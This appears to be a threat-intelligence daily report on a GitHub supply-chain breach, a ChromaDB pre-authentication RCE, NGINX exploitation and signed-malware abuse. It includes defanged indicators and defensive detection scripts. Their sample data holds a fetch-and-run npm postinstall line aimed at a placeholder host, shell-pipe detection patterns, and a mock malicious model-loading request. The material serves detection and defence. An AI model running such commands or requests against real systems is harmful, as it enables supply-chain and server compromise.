DAILY-2026-0520
Critical
Active Exploitation Confirmed

Signed Malware, Poisoned Pipelines, and AI Servers Left Open

Today’s window is defined by a confirmed GitHub internal breach linked to a malicious VSCode extension, a maximum-severity unpatched ChromaDB RCE, active NGINX exploitation, and the wider consequences of signed-malware abuse through Fox Tempest. The report also includes YellowKey and DirtyDecrypt PoCs, a Drupal emergency release warning, Microsoft identity abuse, and the 7-Eleven ShinyHunters breach. The common thread is simple: trust boundaries failed in developer tooling, exposed services, and signing infrastructure.

CVSS Score: 10

IOC Count: 8

Source Count: 13

Confidence Score: 88

CVEs

CVE-2026-45829 CVE-2026-42945 CVE-2026-31635 CVE-2026-42897 YellowKey/GreenPlasma

Actors

TeamPCP, Fox Tempest, Vanilla Tempest, ShinyHunters, Rhysida, Akira, Qilin, BlackByte, INC, Oyster (malware), Lumma Stealer, Vidar

Sectors

Technology, Software Development, Artificial Intelligence, Financial Services, Healthcare, Retail, Education, Government, Critical Infrastructure

Regions

Global, North America, Europe, Middle East and North Africa

Chapter 01 - Executive Overview

Today’s report is dominated by a dangerous combination: a confirmed software supply chain breach at GitHub, a maximum-severity unpatched AI platform vulnerability in ChromaDB, and active exploitation of a critical NGINX flaw. The Fox Tempest takedown adds a separate but related lesson: attackers continue to monetize trust, whether through signed malware or poisoned developer pipelines. The net effect is a day where the weakest trust assumptions in software delivery, identity, and exposed infrastructure all failed at once.

The most urgent business risk is that a malicious VSCode extension was able to penetrate GitHub’s internal environment, which means developer tooling can no longer be treated as a low-risk support function. The second major risk is ChromaDB, where unauthenticated code execution against exposed Python deployments can turn an AI backend into a full compromise path. The third is NGINX, where active exploitation means internet-facing systems cannot wait for normal patch cycles.

Leadership should treat these incidents as a single strategic warning: the trust layer around software delivery, identity, and infrastructure is now a primary attack surface. Organizations need immediate credential rotation, extension review, exposure reduction, and patch verification, not a post-incident retrospective.

Chapter 02 - Threat & Exposure Analysis

The exposure picture is broad but coherent. TeamPCP and the Shai Hulud wave show that software supply chains are now being attacked through developer tools, package publishers, and CI/CD trust boundaries, while ChromaDB and NGINX show that exposed services can be turned into direct remote code execution paths. Fox Tempest adds a third exposure class: abuse of legitimate signing trust to make malware look safe enough to run.

TeamPCP activity is centered on malicious VSCode extension delivery, repository creation artifacts such as tpcp docs, and package tampering through npm workflows. The behavior aligns with supply chain compromise, credential theft, and unauthorized package publication. The fact that GitHub internally confirmed the breach increases the credibility of the entire cluster, even where some lower-level technical details are still being attributed.

CVE-2026-45829 is the clearest single technical exposure in the report. The ChromaDB Python server processes attacker-controlled model configuration before authentication, allowing arbitrary code execution through an exposed collection creation endpoint. This is a severe design flaw because exploitation needs only HTTP reachability and can be performed without valid credentials.

CVE-2026-42945 is the clearest active exploitation case. The NGINX rewrite module heap overflow is being exploited in the wild, and the affected footprint is large because NGINX sits in front of public web properties, APIs, and reverse proxy layers. Even where exploitation only yields denial of service, the operational impact can be immediate and visible.

Fox Tempest shows that signed binaries are no longer a reliable trust signal by themselves. If a malicious payload is delivered through a legitimate signing pipeline, endpoint and email controls that rely too heavily on signature status can fail open. That is a governance problem as much as a technical one.

Chapter 03 - Operational Response

Priority one is exposure reduction. Rotate credentials tied to GitHub workflows, npm publishing, developer machines, and any CI/CD runner that could have handled the compromised VSCode extension or poisoned package activity. Remove unknown extensions, pin dependencies, and block the known TeamPCP domains at DNS and perimeter controls.

Priority two is urgent patching and isolation. Patch NGINX immediately where the vulnerable rewrite pattern exists, isolate or remove exposed ChromaDB Python servers, and move affected workloads to the Rust path where possible. For YellowKey and DirtyDecrypt, apply mitigations and kernel or platform updates while treating them as local-access threats rather than internet-scale threats.

Priority three is trust policy hardening. Review any allowlists or application control policies that treat signed binaries as inherently safe, because the Fox Tempest case shows that valid signing can be abused at scale. For AI systems, enforce network segmentation and authenticated front ends around vector databases and model loading paths.

2026-02-17: HiddenLayer discloses CVE-2026-45829 to ChromaDB maintainers.

2026-04-08: 7-Eleven unauthorized access occurs, later linked to ShinyHunters claims and victim notification.

2026-05-10 to 2026-05-19: TeamPCP and Shai Hulud supply chain activity expands across npm and developer tooling.

2026-05-13: CVE-2026-42945 is disclosed and patches begin appearing.

2026-05-17: DirtyDecrypt PoC is published.

2026-05-18: Drupal announces a highly critical emergency release.

2026-05-19 10:30 UTC: New Shai Hulud wave is observed.

2026-05-20: GitHub confirms the internal repository breach.

Chapter 04 - Detection Intelligence

TeamPCP and Shai Hulud rely on trusted automation boundaries. The malicious VSCode extension and npm package tampering use legitimate developer workflows to trigger execution, then steal tokens and republish poisoned artifacts. The notable technical pattern is abuse of build and publish automation rather than custom malware infrastructure alone.

ChromaDB CVE-2026-45829 is a pre-authentication code execution flaw in the Python FastAPI path. The vulnerable sequence is configuration parsing, model loading, remote code trust, and only then authentication, which creates a dangerous execution-before-authentication condition. That means defenders should focus on traffic to the collections endpoint and any unexpected outbound model registry access from ChromaDB hosts.

NGINX CVE-2026-42945 is a heap overflow in rewrite handling. The practical defensive signal is not a specific malware hash but a pattern of crashing workers, abnormal rewrite-related requests, and unexpected shell execution from NGINX processes. That makes behavioral telemetry more useful than static signatures.

Fox Tempest demonstrates signed malware delivery at scale. The key technical lesson is that certificate presence, even when valid, should not end trust evaluation. Detection must combine signer reputation, file origin, execution context, and post-launch behavior.

Known indicators include scan aquasecurtiy dot org, checkmarx dot zone, models litellm dot cloud, execution dot js, setup dot mjs, tpcp docs, the ChromaDB collections endpoint, and signspace dot cloud. The TeamPCP indicators are most useful for DNS and repository monitoring, while the ChromaDB endpoint is useful for web access monitoring and the Fox Tempest domain is useful for historical infrastructure review.

IOC enrichment remains pending because no consulted source provided passive DNS, hash reputation, WHOIS pivots, or sandbox verdicts. That means these indicators are actionable for hunting and blocking, but not yet ideal for durable reputation scoring.

For TeamPCP, monitor GitHub audit logs for tpcp docs repository creation, watch for package manifest preinstall script changes that launch setup dot mjs, and alert on suspicious npm publish behavior from CI/CD runners. Also monitor DNS and proxy telemetry for contacts to the known TeamPCP domains, and inspect developer endpoints for unauthorized VSCode extensions.
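One way to run the TeamPCP hunts above as code, added here as an example and not taken from the report, GitHub, or npm tooling: it scans npm manifests for lifecycle hooks that launch setup.mjs or execution.js, diffs the lifecycle hooks between two versions of a package, and scans a GitHub audit-log export for repo.create events naming a tpcp docs repository. The manifests and audit events are constructed, the command regexes are assumptions, and the audit-log field names (action, actor, repo) are assumed to follow the JSON export format.

```python
"""Hunt for TeamPCP-style artifacts in npm manifests and GitHub audit logs.
Added example; all sample manifests and audit events below are constructed."""
import json
import re

# Hooks npm runs automatically during install; a poisoned package uses these
# to execute before any human reads the code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Loader file names come from the report; the surrounding regexes are assumptions
# that also catch generic download-and-run shapes.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bsetup\.mjs\b"),
    re.compile(r"\bexecution\.js\b"),
    re.compile(r"\bnode\s+-e\b"),
    re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash|node)\b"),
]


def suspicious_lifecycle_scripts(package_json):
    """Return (hook, command, matched_pattern) for each lifecycle hook that matches."""
    scripts = json.loads(package_json).get("scripts", {})
    hits = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(command):
                hits.append((hook, command, pattern.pattern))
                break
    return hits


def lifecycle_changes(old_package_json, new_package_json):
    """Return {hook: (old_command, new_command)} for hooks added, removed or changed
    between two published versions; a new preinstall hook is the signal to review."""
    old = json.loads(old_package_json).get("scripts", {})
    new = json.loads(new_package_json).get("scripts", {})
    return {
        hook: (old.get(hook), new.get(hook))
        for hook in LIFECYCLE_HOOKS
        if old.get(hook) != new.get(hook)
    }


def tpcp_repo_creations(audit_log_lines):
    """Return (actor, repo) for repo.create events whose name looks like tpcp docs.
    Assumes one JSON object per line with action/actor/repo fields."""
    hits = []
    for line in audit_log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("action") != "repo.create":
            continue
        repo = event.get("repo", "")
        if re.search(r"tpcp[-_ ]?docs", repo, re.IGNORECASE):
            hits.append((event.get("actor"), repo))
    return hits


# Constructed sample data, not real packages or real audit events.
PREVIOUS_MANIFEST = json.dumps(
    {"name": "some-lib", "version": "1.2.3", "scripts": {"test": "jest", "build": "tsc"}}
)
POISONED_MANIFEST = json.dumps(
    {"name": "some-lib", "version": "1.2.4",
     "scripts": {"test": "jest", "build": "tsc", "preinstall": "node setup.mjs"}}
)
PIPED_MANIFEST = json.dumps(
    {"name": "other-lib", "version": "0.3.0",
     "scripts": {"postinstall": "curl -s https://example.invalid/execution.js | node"}}
)
AUDIT_LOG = """{"action":"repo.create","actor":"dev-bot","repo":"org/tpcp-docs","created_at":1}
{"action":"repo.create","actor":"alice","repo":"org/billing-service","created_at":2}
{"action":"git.push","actor":"alice","repo":"org/tpcp-docs","created_at":3}
"""

if __name__ == "__main__":
    print(suspicious_lifecycle_scripts(POISONED_MANIFEST))
    print(suspicious_lifecycle_scripts(PIPED_MANIFEST))
    print(lifecycle_changes(PREVIOUS_MANIFEST, POISONED_MANIFEST))
    print(tpcp_repo_creations(AUDIT_LOG.splitlines()))
```

Run the manifest checks against every package.json that a CI/CD runner installs (including transitive dependencies under node_modules), and run the version diff against the registry copy of the previous release, since the lifecycle hook is what gives the attacker execution on the runner before the publish token is ever used.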

For ChromaDB, alert on HTTP POST activity to the collections endpoint that includes model loading parameters, trust remote code flags, or unexpected outbound requests to HuggingFace or other model registries. Process telemetry should also flag shells, interpreters, or child processes spawned by ChromaDB server processes.
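A request-inspection check for the ChromaDB guidance above, added as an example and not code from ChromaDB, HiddenLayer or the report: it inspects reverse-proxy request records for POSTs to the collections endpoint, flags a missing Authorization header, a trust_remote_code flag and remote model references in the body, and separately flags flows from ChromaDB hosts to model registries. The request and flow records are constructed; the endpoint regex, record field names, the key names searched for and the host lists are assumptions, and the body shape is hypothetical rather than the actual exploit payload.

```python
"""Flag ChromaDB collection-create requests carrying model-loading configuration,
and registry egress from ChromaDB hosts. Added example with constructed records;
endpoint regex, field names, key names and host lists are assumptions."""
import json
import re

# Assumed: the collection-create path as seen at a reverse proxy in front of the
# Python server (flat v1 path or v2 tenant/database path).
COLLECTIONS_PATH = re.compile(
    r"^/api/v\d+(?:/tenants/[^/]+/databases/[^/]+)?/collections/?$"
)
# Assumed key names: a trust_remote_code flag and any key that mentions a model.
REMOTE_CODE_KEY = "trust_remote_code"
MODEL_KEY = re.compile(r"model", re.IGNORECASE)
# Assumed registry hosts and ChromaDB host inventory.
REGISTRY_HOSTS = re.compile(r"(?:^|\.)(?:huggingface\.co|hf\.co)$", re.IGNORECASE)
CHROMA_HOSTS = {"chroma-01", "chroma-02"}


def _walk(obj, path=()):
    """Yield (path, leaf) for every scalar in a nested JSON structure."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _walk(value, path + (str(key),))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from _walk(value, path + (str(index),))
    else:
        yield path, obj


def request_findings(event):
    """Return the reasons a collection-create request deserves review (empty if none)."""
    reasons = []
    if event.get("method") != "POST" or not COLLECTIONS_PATH.match(event.get("path", "")):
        return reasons  # not the endpoint of interest
    headers = {k.lower(): v for k, v in event.get("headers", {}).items()}
    if not headers.get("authorization"):
        reasons.append("unauthenticated collection create")
    try:
        body = json.loads(event.get("body") or "{}")
    except json.JSONDecodeError:
        reasons.append("unparseable JSON body on collection create")
        return reasons
    for path, value in _walk(body):
        key = path[-1] if path else ""
        dotted = ".".join(path)
        if key == REMOTE_CODE_KEY and value is True:
            reasons.append(f"{REMOTE_CODE_KEY}=true at {dotted}")
        elif MODEL_KEY.search(key) and isinstance(value, str) and ("/" in value or value.startswith("http")):
            # "org/name" or a URL looks like a remote model pull rather than a local name
            reasons.append(f"remote model reference {value!r} at {dotted}")
    return reasons


def registry_egress(flow_events):
    """Return (src, dst) for flows from a ChromaDB host to a model registry."""
    return [
        (e["src"], e["dst"])
        for e in flow_events
        if e.get("src") in CHROMA_HOSTS and REGISTRY_HOSTS.search(e.get("dst", ""))
    ]


# Constructed records, not captured traffic.
BENIGN_REQUEST = {
    "method": "POST",
    "path": "/api/v2/tenants/default_tenant/databases/default_database/collections",
    "headers": {"Authorization": "Bearer example-token"},
    "body": '{"name": "docs", "metadata": {"hnsw:space": "cosine"}}',
}
SUSPECT_REQUEST = {
    "method": "POST",
    "path": "/api/v2/tenants/default_tenant/databases/default_database/collections",
    "headers": {},
    "body": '{"name": "docs", "configuration": {"embedding_function": {"name": "huggingface", '
            '"config": {"model_name": "attacker/evil-model", "trust_remote_code": true}}}}',
}
FLOWS = [
    {"src": "chroma-01", "dst": "huggingface.co"},
    {"src": "chroma-01", "dst": "metrics.internal"},
    {"src": "web-01", "dst": "huggingface.co"},
]

if __name__ == "__main__":
    for request in (BENIGN_REQUEST, SUSPECT_REQUEST):
        print(request["path"], request_findings(request))
    print(registry_egress(FLOWS))
```

The unauthenticated finding matters on its own: because the vulnerable sequence handles configuration before authentication, a blocked or 401 response from the application does not mean the model-loading step was skipped, so the proxy record is the place to see the attempt.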

For NGINX, focus on worker crashes, repeated SIGSEGV events, and traffic targeting rewrite heavy locations with unusual query and rewrite patterns. If the process launches shell commands or shows repeated crash loops on exposed instances, treat that as a strong exploitation signal.
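A crash-loop detector for the NGINX signal described above, added as an example and not code from NGINX or the report: it parses error-log lines for worker exits on crash signals and raises an alert when several fall inside a sliding time window. The log lines are constructed; the line regex follows NGINX's own "worker process N exited on signal S" wording, and the signal set, threshold and window are tunable assumptions.

```python
"""Detect NGINX worker crash loops from error-log lines. Added example with
constructed log lines; signal set, threshold and window are assumptions."""
import re
from collections import deque
from datetime import datetime, timedelta

# Matches e.g. "2026/05/20 10:00:01 [alert] 1#1: worker process 5601 exited on signal 11 (core dumped)"
WORKER_EXIT = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[alert\] \d+#\d+: "
    r"worker process (?P<pid>\d+) exited on signal (?P<sig>\d+)"
)
# SIGABRT, SIGBUS, SIGSEGV: memory corruption or abort, not a reload (assumption).
CRASH_SIGNALS = {6, 7, 11}


def worker_crashes(lines):
    """Yield (timestamp, pid, signal) for every worker exit on a crash signal."""
    for line in lines:
        match = WORKER_EXIT.match(line.strip())
        if match and int(match["sig"]) in CRASH_SIGNALS:
            yield (
                datetime.strptime(match["ts"], "%Y/%m/%d %H:%M:%S"),
                int(match["pid"]),
                int(match["sig"]),
            )


def crash_loops(lines, threshold=3, window_seconds=60):
    """Return the timestamps at which `threshold` crashes fell inside a sliding
    window of `window_seconds`; one alert per burst, then the window is reset."""
    window = timedelta(seconds=window_seconds)
    recent = deque()
    alerts = []
    for ts, _pid, _sig in worker_crashes(lines):
        recent.append(ts)
        while recent and ts - recent[0] > window:
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append(ts)
            recent.clear()
    return alerts


# Constructed error-log excerpt: three crashes inside 20 seconds, one clean
# reload exit on SIGTERM, one isolated crash hours later.
NGINX_ERROR_LOG = """2026/05/20 09:59:40 [notice] 1#1: start worker process 5601
2026/05/20 10:00:01 [alert] 1#1: worker process 5601 exited on signal 11 (core dumped)
2026/05/20 10:00:02 [notice] 1#1: start worker process 5602
2026/05/20 10:00:09 [alert] 1#1: worker process 5602 exited on signal 11 (core dumped)
2026/05/20 10:00:10 [notice] 1#1: start worker process 5603
2026/05/20 10:00:15 [error] 1#1: *7 open() "/var/www/missing.html" failed (2: No such file or directory), client: 198.51.100.7
2026/05/20 10:00:20 [alert] 1#1: worker process 5603 exited on signal 11 (core dumped)
2026/05/20 11:00:00 [alert] 1#1: worker process 5610 exited on signal 15
2026/05/20 12:30:00 [alert] 1#1: worker process 5604 exited on signal 11 (core dumped)
"""

if __name__ == "__main__":
    for crash in worker_crashes(NGINX_ERROR_LOG.splitlines()):
        print("crash", crash)
    print("crash loops at", crash_loops(NGINX_ERROR_LOG.splitlines()))
```

Pair the crash-loop alert with the access log for the same instance: the request that killed a worker is often not logged by that worker, so the useful triage step is to pull the requests from the same client in the seconds before each crash timestamp rather than searching for a signature in the request line.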

For Fox Tempest related signed malware, watch for binaries signed with unusual or short-lived certificates, especially where the file runs from temp or user-writable locations and then behaves like ransomware or credential theft malware. Certificate trust should be one input, not the allow decision itself.

Confirmed ATT&CK mapping is limited to the following: T1195.001 for TeamPCP and Shai Hulud supply chain compromise, T1059.006 for the ChromaDB Python execution path, T1190 for public-facing exploitation in ChromaDB and NGINX, T1552.004 for CI/CD and publish credential theft, and T1078 for Microsoft identity and SSPR abuse. These are the only mappings supported strongly enough by the consulted sources to assign as formal techniques.

No additional ATT&CK mappings are assigned for DirtyDecrypt, YellowKey, or Fox Tempest because the consulted sources do not provide explicit technique IDs. Behavioral similarity alone is not enough for formal mapping in this report.

Chapter 05 - Governance, Risk & Compliance

The governance risk is that core trust systems are being abused across multiple layers at once. Software supply chain trust was exploited through GitHub, package publishing, and developer tooling. Infrastructure trust was exploited through NGINX. AI platform trust was exploited through ChromaDB. Signing trust was exploited through Fox Tempest.

For security leaders, the main control gap is overreliance on a single trust signal. Signed binaries, legitimate extensions, and authenticated internal tooling are useful but not sufficient on their own. Policy should require secondary checks such as behavioral telemetry, provenance controls, network segmentation, and privilege boundaries around build and publish systems.

Organizations with AI workloads should treat vector databases and model loading paths as governed production systems, not experimental support services. If these components store or process regulated data, then exposure, logging, and access review should meet the same standard used for ordinary databases and internet facing applications.

Chapter 06 - Adversary Emulation

For TeamPCP style activity, emulate a malicious extension installation on a controlled developer endpoint, then test whether your environment detects token theft, suspicious CI/CD publishing, and rogue package versioning. Hunt for whether the organization can stop the spread before a poisoned package is released.

For ChromaDB style exploitation, simulate unauthenticated requests to the collections endpoint with unexpected model parameters and validate that your logging, egress controls, and service isolation prevent remote code execution from turning into data theft. The goal is to prove that the AI backend cannot freely reach external model registries without authorization.

For NGINX style exploitation, test whether your monitoring can detect rewrite-related probes, worker crash loops, and unusual process spawning from the web tier. A mature defense should identify the exploitation pattern before service disruption becomes customer-facing.

For Fox Tempest style signed malware, test whether application control, EDR, and email gateways still block malicious binaries when they are signed by a trusted issuer. If trust alone causes allow decisions, the control is too weak.

Intelligence Confidence: 88%

Factor: Assessment

Primary source strength: High for ChromaDB and Fox Tempest, strong for GitHub, NGINX, and 7-Eleven, moderate for local PoC items

Corroboration breadth: Strong across multiple consulted sources for the main incidents

Technical specificity: High for ChromaDB, NGINX, and TeamPCP behaviors

Attribution clarity: High for Fox Tempest and ShinyHunters, medium for TeamPCP, low for several vulnerability items

IOC enrichment: Limited

Remaining uncertainty: Present for some CVEs, one Drupal release, and local exploit timelines